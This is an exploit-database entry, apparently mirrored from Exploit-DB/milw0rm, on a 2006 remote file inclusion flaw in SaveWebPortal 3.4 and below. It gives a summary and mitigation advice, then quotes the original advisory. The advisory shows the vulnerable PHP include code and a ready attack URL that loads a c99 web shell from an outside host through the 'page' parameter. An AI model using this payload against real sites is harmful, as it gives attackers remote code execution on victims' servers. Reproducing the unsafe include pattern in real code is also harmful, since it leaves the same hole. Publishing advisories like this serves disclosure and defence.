SaveWebPortal - exploit.company

vendor:

SaveWebPortal

by:

x0rax

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: SaveWebPortal

Affected Version From: 3.4 and below

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability

SaveWebPortal version 3.4 and below is vulnerable to a Remote File Inclusion vulnerability. An attacker can inject malicious code into the 'page' parameter of the index.php file, allowing for the execution of arbitrary code. The attacker must create a file called shell.html.txt or shell.php.txt in order for the exploit to be successful.

Mitigation:

Upgrade to the latest version of SaveWebPortal, or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

--------------------------------------------
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:http://www.circeos.it/frontend/theme4/index.php?page=downloads
--------------------------------------------
Found by x0rax
Master9976@hotmail.de
--------------------------------------------
Vulnerable Code:
<?php
....
if (strstr ($page, ".php") ||
                       strstr ($page, ".htm") ||
                       strstr ($page, ".html")) {
                       include ("$page");
....
?>
--------------------------------------------
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
--------------------------------------------
Affected File:
index.php =]
--------------------------------------------
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
--------------------------------------------

# milw0rm.com [2006-08-10]